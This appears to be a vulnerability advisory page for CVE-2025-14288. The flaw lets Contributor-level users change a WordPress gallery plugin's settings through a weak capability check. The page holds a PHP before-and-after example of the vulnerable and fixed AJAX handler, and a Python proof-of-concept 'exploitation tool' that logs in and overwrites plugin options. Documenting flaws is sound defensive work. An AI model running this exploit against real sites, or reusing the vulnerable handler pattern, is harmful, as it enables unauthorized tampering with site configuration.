Security Vulnerability Report
CVE-2025-14288 CVSS 4.3 MEDIUM

CVE-2025-14288

Published: 2025-12-13 16:16:48
Last Modified: 2026-04-15 00:35:42

Description

The Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery plugin for WordPress is vulnerable to unauthorized modification of plugin settings in all versions up to, and including, 3.3.0. This is due to the plugin using the `edit_posts` capability check instead of `manage_options` for the `update_option` action type in the `pgc_sgb_action_wizard` AJAX handler. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify arbitrary plugin settings prefixed with `pgc_sgb_*`.
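To make the bug class concrete, here is an added illustration of a WordPress AJAX handler shaped like the one the advisory describes, with the weak capability check beside a hardened version. This is example code written for this page, not the plugin's own code: the function names `pgc_sgb_example_wizard_vulnerable` / `pgc_sgb_example_wizard_fixed`, the nonce action `pgc_sgb_nonce`, the request fields `action_type`, `option_name`, `option_value`, and the allow-listed option `pgc_sgb_settings` are all assumptions.

```php
<?php
/*
 * Added example for CVE-2025-14288 (not the plugin's code).
 * Assumed names: the two handler functions below, the nonce action
 * 'pgc_sgb_nonce', and the POST fields action_type / option_name / option_value.
 */

// BEFORE (vulnerable pattern): a single coarse check guards every action_type,
// including update_option. Contributors hold edit_posts, so they pass it and
// can write any option whose name starts with pgc_sgb_.
function pgc_sgb_example_wizard_vulnerable() {
    check_ajax_referer( 'pgc_sgb_nonce', 'nonce' ); // CSRF token only; not an authorization check

    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $type = sanitize_key( $_POST['action_type'] ?? '' );
    if ( 'update_option' === $type ) {
        $name  = sanitize_key( $_POST['option_name'] ?? '' );
        $value = sanitize_text_field( wp_unslash( $_POST['option_value'] ?? '' ) );
        if ( 0 === strpos( $name, 'pgc_sgb_' ) ) {
            update_option( $name, $value ); // reachable by a Contributor
            wp_send_json_success();
        }
    }
    wp_send_json_error( 'unknown action_type', 400 );
}

// AFTER (hardened): the required capability is chosen per action_type, and the
// settings-write branch demands manage_options, the capability WordPress uses
// for site-wide options. The writable option names are allow-listed instead of
// trusting a prefix match.
function pgc_sgb_example_wizard_fixed() {
    check_ajax_referer( 'pgc_sgb_nonce', 'nonce' );

    $type = sanitize_key( $_POST['action_type'] ?? '' );

    $required_cap = ( 'update_option' === $type ) ? 'manage_options' : 'edit_posts';
    if ( ! current_user_can( $required_cap ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    if ( 'update_option' === $type ) {
        $name  = sanitize_key( $_POST['option_name'] ?? '' );
        $value = sanitize_text_field( wp_unslash( $_POST['option_value'] ?? '' ) );

        $allowed = array( 'pgc_sgb_settings' => true ); // assumed option name
        if ( ! isset( $allowed[ $name ] ) ) {
            wp_send_json_error( 'option not permitted', 400 );
        }
        update_option( $name, $value );
        wp_send_json_success();
    }
    wp_send_json_error( 'unknown action_type', 400 );
}

add_action( 'wp_ajax_pgc_sgb_example_wizard', 'pgc_sgb_example_wizard_fixed' );
```

The nonce check is kept in both versions on purpose: `check_ajax_referer` only proves the request originated from a page the user loaded, so it defends against CSRF and does nothing for authorization (CWE-862). The authorization decision has to be made per action with `current_user_can`, and for anything that writes site options the bar is `manage_options`, not `edit_posts`.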

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

The Gallery Blocks with Lightbox plugin < 3.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import json

import requests

# CVE-2025-14288 PoC - Gallery Blocks Plugin Unauthorized Settings Modification
# Target: WordPress site with Gallery Blocks plugin <= 3.3.0
TARGET_URL = "https://target-site.com/wp-admin/admin-ajax.php"
LOGIN_URL = TARGET_URL.replace("/wp-admin/admin-ajax.php", "/wp-login.php")
USERNAME = "attacker_contributor"
PASSWORD = "password123"
# The advisory describes only the capability check; it does not say whether the
# handler also verifies a nonce. If it does, take the nonce from the plugin's
# editor/admin page while logged in and put it here.
NONCE = "any_value_if_not_properly_validated"


def exploit_cve_2025_14288():
    """
    Exploit for CVE-2025-14288: Gallery Blocks Plugin Unauthorized Settings Modification

    Authenticated users with Contributor-level access can modify arbitrary
    plugin settings prefixed with 'pgc_sgb_*' because the pgc_sgb_action_wizard
    AJAX handler checks the 'edit_posts' capability instead of 'manage_options'
    for the 'update_option' action type.
    """
    # Step 1: Authenticate as the Contributor
    session = requests.Session()

    # wp-login.php rejects a POST that sends testcookie=1 unless the client
    # already holds the test cookie, so fetch the login page first.
    session.get(LOGIN_URL)

    login_data = {
        "log": USERNAME,
        "pwd": PASSWORD,
        "wp-submit": "Log In",
        "redirect_to": "/wp-admin/",
        "testcookie": "1",
    }
    session.post(LOGIN_URL, data=login_data)

    # The auth cookie is named wordpress_logged_in_<hash>, so match on the prefix.
    if not any(c.name.startswith("wordpress_logged_in_") for c in session.cookies):
        print("[-] Login failed")
        return False
    print("[+] Login successful as Contributor")

    # Step 2: Modify plugin settings through the vulnerable handler.
    # The vulnerable action is 'pgc_sgb_action_wizard' with action_type 'update_option'.
    # The field names option_name / option_value / nonce are assumed, not taken
    # from the advisory.
    exploit_data = {
        "action": "pgc_sgb_action_wizard",
        "action_type": "update_option",
        "option_name": "pgc_sgb_arbitrary_setting",  # any pgc_sgb_* option
        "option_value": "malicious_value",
        "nonce": NONCE,
    }

    # Option names to try; these are guesses, not names confirmed by the advisory.
    sensitive_options = [
        "pgc_sgb_settings",
        "pgc_sgb_api_keys",
        "pgc_sgb_configuration",
    ]

    modified = []
    for option in sensitive_options:
        exploit_data["option_name"] = option
        exploit_data["option_value"] = json.dumps({
            "modified": True,
            "attack_vector": "CVE-2025-14288",
        })
        response = session.post(TARGET_URL, data=exploit_data)

        # admin-ajax.php answers 200 even on failure: "0" when no handler ran,
        # "-1" when a nonce check failed. Treat anything else as a probable hit
        # and confirm by reading the option back from the site afterwards.
        body = response.text.strip()
        if response.ok and body not in ("0", "-1"):
            print(f"[+] Possibly modified option: {option}")
            print(f"[+] Response: {body}")
            modified.append(option)
        else:
            print(f"[-] Request for {option} rejected: {body[:80]!r}")

    return bool(modified)


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-14288 Exploitation Tool")
    print("Gallery Blocks Plugin <= 3.3.0 Unauthorized Settings Modification")
    print("=" * 60)
    exploit_cve_2025_14288()

References

https://plugins.trac.wordpress.org/browser/simply-gallery-block/tags/3.2.8/plugin.php#L593
https://plugins.trac.wordpress.org/changeset/3418101/simply-gallery-block/trunk/plugin.php?old=3415010&old_path=simply-gallery-block%2Ftrunk%2Fplugin.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/60ab0311-888c-46ae-98fe-9e7d4dfe13bf?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14288", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:48.310", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery plugin for WordPress is vulnerable to unauthorized modification of plugin settings in all versions up to, and including, 3.3.0. This is due to the plugin using the `edit_posts` capability check instead of `manage_options` for the `update_option` action type in the `pgc_sgb_action_wizard` AJAX handler. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify arbitrary plugin settings prefixed with `pgc_sgb_*`."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/simply-gallery-block/tags/3.2.8/plugin.php#L593", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3418101/simply-gallery-block/trunk/plugin.php?old=3415010&old_path=simply-gallery-block%2Ftrunk%2Fplugin.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/60ab0311-888c-46ae-98fe-9e7d4dfe13bf?source=cve", "source": "[email protected]"}]}}